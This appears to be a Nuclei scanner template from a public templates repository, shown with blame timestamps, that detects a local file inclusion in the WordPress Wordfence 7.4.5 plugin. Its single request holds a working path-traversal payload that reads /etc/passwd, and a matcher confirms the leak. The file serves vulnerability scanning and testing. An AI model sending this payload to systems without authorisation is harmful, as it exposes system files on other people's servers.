nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml

34 lines
887 B
YAML
Raw Normal View History

2021-07-12 09:45:23 +00:00
id: wordpress-wordfence-lfi
2021-07-12 09:45:23 +00:00
info:
name: WordPress Wordfence 7.4.5 - Local File Inclusion
2021-07-12 09:45:23 +00:00
author: 0x_Akoko
severity: high
description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
reference:
2021-07-12 09:45:23 +00:00
- https://www.exploit-db.com/exploits/48061
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: wordpress,wp-plugin,lfi,wordfence,edb
2021-07-12 09:45:23 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-12 09:45:23 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29